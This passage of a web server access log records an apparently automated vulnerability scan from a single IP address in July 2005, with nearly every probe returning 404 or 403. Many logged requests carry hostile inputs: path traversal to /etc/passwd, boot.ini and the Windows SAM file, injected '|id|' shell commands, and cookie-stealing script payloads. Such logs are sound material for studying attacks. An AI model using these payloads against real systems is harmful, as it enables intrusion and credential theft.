(compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/bsguest.cgi HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/bslist.cgi HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /showphoto.php? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /php/php.exe?c:\\winnt\\repair\\sam HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/empower?DB=UkRteamHole HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /dns/ndcr.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /pub/english.cgi?op=rmail%20 HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /pub/english.cgi HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /globals.pl HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/subscribe/bsml.pl? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /wbboard/profile.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /bytehoard/index.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /shop/show.php? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /ans.pl? HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /caupo/admin/admin_workspace.php? HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/rpm_query HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /ans.pl? HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /ccbill/whereami.cgi? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/shopper.cgi HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php? HTTP/1.0" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /email.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /class/mysql.class%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/cgiforum.pl HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/CSMailto/CSMailto.cgi? HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:37 +0100] "GET /b2-tools/gm-2-b2.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:37 +0100] "GET /CSNews.cgi? HTTP/1.0" 403 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /csPassword.cgi?command=remove%20 HTTP/1.0" 403 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /index.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /question/crm/download.php?filename=../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /Include/functions_message.php? HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /..\\..\\..\\..\\..\\..\\temp\\temp.class HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /citrix/metaframexp/default/login.asp? HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /launch.asp? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /uifc/MultFileUploadHandler.php%20 HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin?page/CommerceSQL/index.cgi=../../../../../../../../etc/services%20 HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /albums/userpics/Copperminer.jpg.php? HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/imageFolio.cgi? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /directory/showcat.php?cat=[query] HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /scripts/counter.exe HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/csChatRBox.cgi? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /bugtest+/%20 HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/csGuestbook.cgi? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /jsptest.jsp+ HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/csLiveSupport.cgi? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/csSearch.cgi? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/csNews.cgi? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /directory/calendar_download.php? HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/cutecast/members/ HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /directory/showphoto.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cutenews/index.php?debug HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cgi-bin/empower?DB=UkRteamHole%20 HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:38 +0100] "GET /cutenews/comments.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /includes/header.php3? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /syslog.htm?%20 HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /cgi-bin/dansguardian.pl? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /dansguardian/edit.cgi?file=/etc/services HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /wbboard/reply.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /DB4Web/172.31.93.30:22/foo%20 HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:39 +0100] "GET /shop/search.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /servlet/ContentServer? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /cgi-bin/db4web_c/dbdirname//etc/hosts%20 HTTP/1.0" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /dotproject/modules/tasks/viewgantt.php? HTTP/1.0" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /launch.jsp? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /edittag/edittag.cgi? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /dynamicpages/fast/config_page.php? HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /admin/exec.php3? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /admin/system.php3? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /cgi-bin/CSMailto.cgi? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /project/index.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:40 +0100] "GET /templates/CommonPage____19461.asp HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /includes/footer.php3? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /nph-emumail.cgi?type=../%00 HTTP/1.0" 403 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /init.emu%20 HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /nph-emumail.cgi?type=../%00 HTTP/1.0" 403 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /mod.php? HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /cgi-bin/mmstdod.cgi HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /cgi-bin/esp? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /cgi-bin/esp? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /admin/settings.inc.php%20 HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /Include/functions_hacking.php? HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /news_view.asp? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /news_sort.asp? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /cgi-bin/search.cgi HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /index.php/content/search/? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /kernel/classes/ezrole.php HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /settings/site.ini HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /cgi-bin/dcforum/dcboard.cgi HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /admin_t/include/aff_liste_langue.php? HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:41 +0100] "GET /calendar.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /admin/inc_config.asp%20 HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /deskpro_v1/view.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /doc/ HTTP/1.0" 404 198 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /cgi-bin/cgforum.cgi HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini%20 HTTP/1.0" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /dotproject/modules/tasks/addedit.php? HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /invitefriends.php3? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /ez2000/ezadmin.cgi HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /cgi-bin/loadpage.cgi? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /author.asp? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /cgi-bin/fom/fom.cgi? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:42 +0100] "GET /cgi-bin/faqmanager.cgi? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /cgi-bin//FileSeek.cgi?head=|id|&foot= HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /cgi-bin/finger HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /search.pl? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /system/linkurl.asp?root=../../../%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /firewall/policy/dlg? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /directory/showproduct.php?product=[query]%20 HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /shop/search.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /gallery/init.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /gb/index.php?login=true%20 HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /topic/entete.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /cgi-bin/gbook.cgi HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /comment.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /profiles.php?uid=<script>alert(document.cookie)</script> HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /webmail/emumail.fcgi? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /quikmail/nph-emumail.cgi?type=../%00 HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /users.php?mode=profile&uid=<script>alert(document.cookie)</script> HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /cgi-bin/aglimpse HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /adv/gm001-mc/ HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /cgi-bin/guestbook/passwd HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /tinymsg.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /Include/functions_folder.php? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /cutenews/search.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /shop/normal_html.cgi?%20file=;id|%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /category_news.asp? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /shop/normal_html.cgi?%20file=;id|%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /shop/normal_html.cgi? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /kernel/class/delete.php HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:43 +0100] "GET /shop/normal_html.cgi?file=../../../../../../etc/issue%00 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /emml_email_func.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /cgi-local/shop.pl/shop.cfg HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /cgi-bin/auktion.pl HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /admin/cms/htmltags.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /deskpro_v1/faq.php?cat=45' HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /status.php3? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /ldap.search.php3?ldap_serv=nonsense%20 HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /imp/mailbox.php3? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /dotproject/modules/projects/vw_files.php? HTTP/1.0" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /advwebadmin/folders/filemanager.asp HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /advwebadmin/folders/File_editor.asp HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /ez2000/ezman.cgi HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /includes/hnmain.inc.php3? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:44 +0100] "GET /security/web_access.html HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/hpnst.exe?c=p+i=hpnst.exe HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /htmltonuke.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin//FileSeek.cgi?head=&foot=|id| HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - 